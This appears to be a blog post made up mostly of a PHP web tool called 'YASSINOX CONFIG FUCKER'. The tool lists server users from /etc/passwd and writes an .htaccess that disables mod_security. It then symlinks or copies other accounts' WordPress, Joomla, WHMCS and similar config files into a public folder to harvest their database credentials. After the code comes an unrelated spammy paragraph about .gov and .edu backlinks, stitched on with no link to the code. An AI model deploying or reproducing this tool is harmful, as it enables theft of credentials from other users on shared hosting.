<style type=text/css>
.rules
{text-shadow:5px 5px 10px red;}
.owner
{text-shadow:5px 5px 10px orange;}
.mod
{text-shadow:5px 5px 10px white;}
.member
{text-shadow:5px 5px 10px blue;}
.guest
{text-shadow:5px 5px 10px green;}
.tags
{text-shadow:5px 5px 10px grey;}
.title
{text-shadow:5px 5px 10px purple;}
.numbers
{text-shadow:1px 5px 10px white;}
body {background-color: transparent;color: #FFFFFF;}
</style>
<br>
<br>
<center> <!-- IE doesn't like CSS Centering -->
<table border="0">
<table bgcolor="black" border="1">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th>
<br>
<span style="text-shadow:5px 5px 10px red;"><font size="7">YASSINOX CONFIG FUCKER</font></span>
</th>
</tr>
<td>
<table border="1" bgcolor="black" align="center">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th width="481" class="title"><span style="text-shadow:5px 5px 10px red;">Normal Grabber</span></th>
<th width="514" class="title"><span style="text-shadow:5px 5px 10px red;">Bypass Grabber</span></th>
</tr>
</tr><tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<td>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<br>
<form method=post>
<textarea rows=10 cols=50 name=usern><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitn value="Grab It " /></form></center>
</td>
<td>
<table border="1" cellpadding="1" width="514" height="300" bgcolor="black"></td>
</tr>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<form method=post>
<textarea rows=10 cols=50 name=userb><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitb value="Bypass It " /></form></center>
</td>
</td>
</tr>
</table></table></table>
<td>
</center>
<?php
if(isset($_POST['submitn']))
{
mkdir('yassinoxnormal',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxnormal/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "/home/".$ad."/public_html/".$config;
$import = "yassinoxnormal/".$ad."_".$config;
symlink($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxnormal/">Configuration Files</a> <--</font></span></center>';
}
?>
<?php
if(isset($_POST['submitb']))
{
mkdir('yassinoxbypass',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxbypass/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "../../".$ad."/public_html/".$config;
$import = "yassinoxbypass/".$ad."_".$config;
copy($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxbypass/">Configuration Files</a> <--</font></span></center>';
}
?>
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...
Comments
Post a Comment